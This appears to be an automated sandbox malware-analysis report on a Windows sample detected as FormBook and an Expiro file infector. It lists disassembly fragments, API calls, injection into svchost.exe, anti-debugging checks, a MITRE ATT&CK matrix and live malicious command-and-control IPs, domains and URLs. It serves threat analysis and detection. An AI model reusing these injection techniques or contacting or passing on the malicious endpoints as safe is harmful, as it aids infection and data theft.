          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EB20 mov eax, dword ptr fs:[00000030h]3_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EB20 mov eax, dword ptr fs:[00000030h]3_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F8B28 mov eax, dword ptr fs:[00000030h]3_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F8B28 mov eax, dword ptr fs:[00000030h]3_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]3_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]3_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]3_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]3_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]3_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]3_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DEBD0 mov eax, dword ptr fs:[00000030h]3_2_034DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]3_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]3_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]3_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EBFC mov eax, dword ptr fs:[00000030h]3_2_0345EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BCBF0 mov eax, dword ptr fs:[00000030h]3_2_034BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440BBE mov eax, dword ptr fs:[00000030h]3_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440BBE mov eax, dword ptr fs:[00000030h]3_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4BB0 mov eax, dword ptr fs:[00000030h]3_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4BB0 mov eax, dword ptr fs:[00000030h]3_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440A5B mov eax, dword ptr fs:[00000030h]3_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440A5B mov eax, dword ptr fs:[00000030h]3_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]3_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]3_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]3_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DEA60 mov eax, dword ptr fs:[00000030h]3_2_034DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034ACA72 mov eax, dword ptr fs:[00000030h]3_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034ACA72 mov eax, dword ptr fs:[00000030h]3_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BCA11 mov eax, dword ptr fs:[00000030h]3_2_034BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA24 mov eax, dword ptr fs:[00000030h]3_2_0346CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EA2E mov eax, dword ptr fs:[00000030h]3_2_0345EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03454A35 mov eax, dword ptr fs:[00000030h]3_2_03454A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03454A35 mov eax, dword ptr fs:[00000030h]3_2_03454A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA38 mov eax, dword ptr fs:[00000030h]3_2_0346CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]3_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]3_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]3_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430AD0 mov eax, dword ptr fs:[00000030h]3_2_03430AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03464AD0 mov eax, dword ptr fs:[00000030h]3_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03464AD0 mov eax, dword ptr fs:[00000030h]3_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346AAEE mov eax, dword ptr fs:[00000030h]3_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346AAEE mov eax, dword ptr fs:[00000030h]3_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504A80 mov eax, dword ptr fs:[00000030h]3_2_03504A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468A90 mov edx, dword ptr fs:[00000030h]3_2_03468A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438AA0 mov eax, dword ptr fs:[00000030h]3_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438AA0 mov eax, dword ptr fs:[00000030h]3_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486AA4 mov eax, dword ptr fs:[00000030h]3_2_03486AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0946 mov eax, dword ptr fs:[00000030h]3_2_034B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504940 mov eax, dword ptr fs:[00000030h]3_2_03504940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]3_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]3_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]3_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E mov eax, dword ptr fs:[00000030h]3_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E mov edx, dword ptr fs:[00000030h]3_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E mov eax, dword ptr fs:[00000030h]3_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4978 mov eax, dword ptr fs:[00000030h]3_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4978 mov eax, dword ptr fs:[00000030h]3_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC97C mov eax, dword ptr fs:[00000030h]3_2_034BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE908 mov eax, dword ptr fs:[00000030h]3_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE908 mov eax, dword ptr fs:[00000030h]3_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC912 mov eax, dword ptr fs:[00000030h]3_2_034BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428918 mov eax, dword ptr fs:[00000030h]3_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428918 mov eax, dword ptr fs:[00000030h]3_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B892A mov eax, dword ptr fs:[00000030h]3_2_034B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C892B mov eax, dword ptr fs:[00000030h]3_2_034C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C69C0 mov eax, dword ptr fs:[00000030h]3_2_034C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034649D0 mov eax, dword ptr fs:[00000030h]3_2_034649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FA9D3 mov eax, dword ptr fs:[00000030h]3_2_034FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE9E0 mov eax, dword ptr fs:[00000030h]3_2_034BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034629F9 mov eax, dword ptr fs:[00000030h]3_2_034629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034629F9 mov eax, dword ptr fs:[00000030h]3_2_034629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]3_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034309AD mov eax, dword ptr fs:[00000030h]3_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034309AD mov eax, dword ptr fs:[00000030h]3_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B89B3 mov esi, dword ptr fs:[00000030h]3_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B89B3 mov eax, dword ptr fs:[00000030h]3_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B89B3 mov eax, dword ptr fs:[00000030h]3_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03442840 mov ecx, dword ptr fs:[00000030h]3_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460854 mov eax, dword ptr fs:[00000030h]3_2_03460854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434859 mov eax, dword ptr fs:[00000030h]3_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434859 mov eax, dword ptr fs:[00000030h]3_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE872 mov eax, dword ptr fs:[00000030h]3_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE872 mov eax, dword ptr fs:[00000030h]3_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6870 mov eax, dword ptr fs:[00000030h]3_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6870 mov eax, dword ptr fs:[00000030h]3_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC810 mov eax, dword ptr fs:[00000030h]3_2_034BC810
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B21361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B21361
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B24C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B24C7B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 290D008Jump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"Jump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
          Source: UaOJAOMxcU.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: UaOJAOMxcU.exeBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062868407.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062868407.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: UaOJAOMxcU.exeBinary or memory string: WIN_81
          Source: UaOJAOMxcU.exeBinary or memory string: WIN_XP
          Source: UaOJAOMxcU.exeBinary or memory string: WIN_XPe
          Source: UaOJAOMxcU.exeBinary or memory string: WIN_VISTA
          Source: UaOJAOMxcU.exeBinary or memory string: WIN_7
          Source: UaOJAOMxcU.exeBinary or memory string: WIN_8
          Source: UaOJAOMxcU.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		1
          Taint Shared Content          		1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Service Execution          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Windows Service          		2
          Valid Accounts          		3
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          Software Packing          		NTDS125
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Windows Service          		1
          Timestomp          		LSA Secrets261
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts212
          Process Injection          		1
          DLL Side-Loading          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
          Masquerading          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Valid Accounts          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Access Token Manipulation          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          UaOJAOMxcU.exe78%VirustotalBrowse
          UaOJAOMxcU.exe96%ReversingLabsWin32.Virus.Expiro
          UaOJAOMxcU.exe100%AviraW32/Infector.Gen
          UaOJAOMxcU.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
          C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
          C:\Windows\System32\alg.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://54.244.188.177/100%Avira URL Cloudmalware
          http://54.244.188.177/rhimsaly100%Avira URL Cloudmalware
          http://54.244.188.177/rhimsalyUS100%Avira URL Cloudmalware
          http://54.244.188.177/2100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ssbzmoy.biz
          		18.141.10.107
          		truefalse
            		high
            pywolwnvd.biz
            		54.244.188.177
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://pywolwnvd.biz/rhimsalyfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://54.244.188.177/rhimsalyUaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://54.244.188.177/UaOJAOMxcU.exe, 00000000.00000002.2062897697.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://pywolwnvd.biz/UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://54.244.188.177/2UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://54.244.188.177/rhimsalyUSUaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BA1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
